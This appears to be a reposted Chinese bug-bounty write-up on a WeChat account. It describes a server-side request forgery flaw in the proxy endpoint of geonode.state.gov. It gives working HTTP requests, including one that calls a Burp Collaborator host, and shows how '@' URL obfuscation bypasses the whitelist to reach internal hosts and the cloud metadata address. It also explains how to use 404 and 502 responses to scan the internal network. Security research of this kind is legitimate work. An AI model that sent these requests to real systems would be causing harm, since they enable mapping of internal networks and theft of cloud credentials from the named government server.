target: geonode.state.gov
GET geonode.state.gov/proxy/url=http://burpcollablink@geonode.state.gov
上方这个url将从服务器向您的打嗝协作者URL发送请求HTTP SSRF的内部主机发生在这种攻击时,会收到一个404未找到显示主机已被击中这意味着攻击者可以扫描整个内部网络范围,以确定活动的内部主机,寻找响应“404未找到”意味着主机是活的 不存在的主机给出502 Bad Gateway响应
GET /proxy/?url=http://[email protected] HTTP/1.1
Host: geonode.state.gov
Cookie: _fbp=fb.1.1666456155855.1682524151;
这个方法绕过了主机试图应用的严格白名单,并且可以通过URL混淆url=https://internalhost@ whitebrowdhost.com绕过--在后端命中URL中的第一个主机如果发送请求/proxy/?url=http:169.254.169.254 会被被阻止 如果发送/proxy/?url=http:[email protected] 可以成功命中该内部主机。ssrf错误配置允许在内部网络上进行内部主机扫描:
喜欢朋友可以点点赞转发转发。
免责声明:本公众号不承担任何由于传播、利用本公众号所发布内容而造成的任何后果及法律责任。未经许可,不得转载。
原文始发于微信公众号(重生者安全团队):【赏金猎人】验证白名单以执行SSRF进行内部主机扫描
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论